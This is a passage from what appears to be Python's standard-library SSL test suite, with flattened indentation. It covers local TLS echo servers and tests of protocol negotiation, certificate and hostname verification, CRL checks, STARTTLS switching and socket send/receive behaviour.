sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler (asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
socket.socket() as sock, \
ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = ssl.wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
